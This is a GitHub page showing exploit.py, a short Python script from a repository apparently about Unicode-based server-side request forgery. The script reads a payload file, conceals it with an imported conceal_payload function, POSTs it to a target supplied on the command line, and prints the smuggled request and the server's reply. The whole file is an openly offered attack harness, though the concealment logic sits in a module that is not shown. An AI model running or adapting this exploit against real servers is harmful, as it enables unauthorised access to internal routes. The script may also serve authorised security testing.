Unicode-SSRF/exploit.py at main · subatiq/Unicode-SSRF · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from pathlib import Path
import sys

import requests
from unicode_ssrf import conceal_payload


if __name__ == '__main__':
    """
    An example of usage:
    python3 exploit.py localhost:8080/private_route payload
                                                    -------
                                                    path to a file with payload
    """
    target = sys.argv[1]

    payload_text = Path(sys.argv[2]).read_text()
    payload = conceal_payload(payload_text)

    data = {
        "parameter": payload,
    }

    print(f'[*] Sending payload to {target}')
    print(f'[*] Smuggled request: {payload_text}')
    print(f'[*] Payload: {payload}')

    response = requests.post(f'http://{target}', data=data)

    print(f'[*] Response: {response.text}')